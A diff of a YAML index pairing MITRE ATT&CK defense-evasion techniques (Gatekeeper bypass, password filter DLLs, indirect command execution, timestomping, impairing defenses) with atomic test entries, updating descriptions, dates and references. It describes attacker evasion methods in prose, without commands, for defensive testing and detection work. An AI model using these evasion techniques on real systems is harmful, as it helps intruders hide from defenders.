-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-21T19:30:58.414Z'
       name: 'Subvert Trust Controls: Gatekeeper Bypass'
       description: |-
         Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -3354,7 +3423,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.001
     atomic_tests:
     - name: Gatekeeper Bypass
@@ -3439,7 +3507,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.009:
     technique:
@@ -3504,11 +3571,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:27:04.900Z'
       name: 'File and Directory Permissions Modification: Windows File and Directory
         Permissions Modification'
       description: |-
@@ -3569,12 +3635,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -3600,7 +3665,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -3642,7 +3707,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.007:
     technique:
@@ -3684,7 +3748,7 @@ defense-evasion:
         Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
 
         Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:33:16.346Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Binary Proxy Execution: Msiexec'
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -3707,36 +3771,11 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.007
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -3760,22 +3799,44 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1070.007:
@@ -3850,7 +3911,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1600.001:
     technique:
@@ -3876,7 +3936,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:36:22.369Z'
       name: Reduce Key Space
       description: |-
         Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3899,8 +3959,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.003:
     technique:
@@ -3996,7 +4054,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.003
     atomic_tests:
     - name: Clear Bash history (rm)
@@ -4104,60 +4161,71 @@ defense-evasion:
         name: sh
   T1202:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-03T14:47:17.154Z'
+      name: Indirect Command Execution
+      description: |-
+        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
       x_mitre_contributors:
       - Matthew Demaske, Adaptforward
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+        such as Sysmon, for events such as process creations that include or are resulting
+        from parameters associated with invoking programs/commands/files and/or spawning
+        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      x_mitre_defense_bypassed:
+      - Static File Analysis
+      - Application Control
       type: attack-pattern
       id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
       created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1202
         url: https://attack.mitre.org/techniques/T1202
+        external_id: T1202
+      - source_name: Bleeping Computer - Scriptrunner.exe
+        description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+          tool to deploy malware. Retrieved July 8, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
       - source_name: Evi1cg Forfiles Nov 2017
-        url: https://twitter.com/Evi1cg/status/935027922397573120
         description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
-          January 22, 2018.
+          September 12, 2024.
+        url: https://x.com/Evi1cg/status/935027922397573120
       - source_name: RSA Forfiles Aug 2017
-        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
         description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
           (if you are watching for cmd.exe). Retrieved January 22, 2018.
+        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+      - source_name: Secure Team - Scriptrunner.exe
+        description: Secure Team - Information Assurance. (2023, January 8). Windows
+          Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+        url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+      - source_name: SS64
+        description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+        url: https://ss64.com/nt/scriptrunner.html
       - source_name: VectorSec ForFiles Aug 2017
-        url: https://twitter.com/vector_sec/status/896049052642533376
         description: vector_sec. (2017, August 11). Defenders watching launches of
-          cmd? What about forfiles?. Retrieved January 22, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
-        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Indirect Command Execution
-      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
-        such as Sysmon, for events such as process creations that include or are resulting
-        from parameters associated with invoking programs/commands/files and/or spawning
-        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'Process: Process Creation'
-      x_mitre_defense_bypassed:
-      - Static File Analysis
-      - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+          cmd? What about forfiles?. Retrieved September 12, 2024.
+        url: https://x.com/vector_sec/status/896049052642533376
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1202
     atomic_tests: []
   T1140:
@@ -4224,7 +4292,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1140
     atomic_tests:
     - name: Base64 decoding with Python
@@ -4449,17 +4516,20 @@ defense-evasion:
         elevation_required: false
   T1562:
     technique:
-      modified: '2023-10-20T16:43:53.391Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Impair Defenses
-      description: |-
+      description: |+
         Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
 
-        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
 
-        Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Jamie Williams (U ω U), PANW Unit 42
+      - Liran Ravich, CardinalOps
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
@@ -4468,15 +4538,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - IaaS
       - Linux
       - macOS
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Cloud Service: Cloud Service Disable'
@@ -4514,15 +4586,17 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1562
         external_id: T1562
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Emotet shutdown
         description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
           File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
         url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562
     atomic_tests: []
   T1055.003:
@@ -4546,7 +4620,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -4594,13 +4668,11 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1036:
     technique:
-      modified: '2024-03-08T17:00:59.133Z'
+      modified: '2024-10-16T20:10:38.450Z'
       name: Masquerading
       description: |-
         Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -4616,7 +4688,7 @@ defense-evasion:
       - Felipe Espósito, @Pr0teus
       - Elastic
       - Bartosz Jerzman
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -4641,6 +4713,7 @@ defense-evasion:
       - 'Process: Process Creation'
       - 'Image: Image Metadata'
       - 'Scheduled Job: Scheduled Job Metadata'
+      - 'User Account: User Account Creation'
       - 'File: File Metadata'
       - 'Scheduled Job: Scheduled Job Modification'
       - 'Command: Command Execution'
@@ -4658,8 +4731,8 @@ defense-evasion:
         external_id: T1036
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -4672,12 +4745,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036
     atomic_tests: []
   T1070.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:43:56.839Z'
       name: 'Email Collection: Mailbox Manipulation'
       description: "Adversaries may modify mail and mail application data to remove
         evidence of their activity. Email applications allow users and other programs
@@ -4714,9 +4786,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'File: File Deletion'
@@ -4754,9 +4825,8 @@ defense-evasion:
         url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.008
     atomic_tests:
     - name: Copy and Delete Mailbox Data on macOS
@@ -4795,7 +4865,7 @@ defense-evasion:
         elevation_required: true
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -4898,12 +4968,11 @@ defense-evasion:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -4987,7 +5056,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218:
     technique:
@@ -5054,60 +5122,77 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218
     atomic_tests: []
   T1070.006:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Romain Dumont, ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
-      type: attack-pattern
-      created: '2020-01-31T12:42:44.103Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.006
-        url: https://attack.mitre.org/techniques/T1070/006
-      - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
-        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
-          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
-        source_name: WindowsIR Anti-Forensic Techniques
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-30T15:14:56.021Z'
       name: 'Indicator Removal on Host: Timestomp'
       description: |-
-        Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+        Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+        Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+        Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+        Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
 
         Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Romain Dumont, ESET
+      - Mike Hartley @mikehartley10
+      x_mitre_deprecated: false
       x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
         have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
         It may be possible to detect timestomping using file modification monitoring
         that collects information on file handle opens and can compare timestamp values.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Process: OS API Execution'
       - 'File: File Modification'
       - 'File: File Metadata'
+      - 'Command: Command Execution'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_permissions_required:
-      - root
-      - SYSTEM
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+      created: '2020-01-31T12:42:44.103Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/006
+        external_id: T1070.006
+      - source_name: WindowsIR Anti-Forensic Techniques
+        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+        url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+      - source_name: Inversecos Timestomping 2022
+        description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+          Detection – NTFS Forensics. Retrieved September 30, 2024.'
+        url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+      - source_name: Magnet Forensics
+        description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+          with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+        url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+      - source_name: Double Timestomping
+        description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+          ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+        url: https://x.com/matthewdunwoody/status/1519846657646604289
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1070.006
     atomic_tests:
     - name: Set a file's access timestamp
@@ -5364,9 +5449,76 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
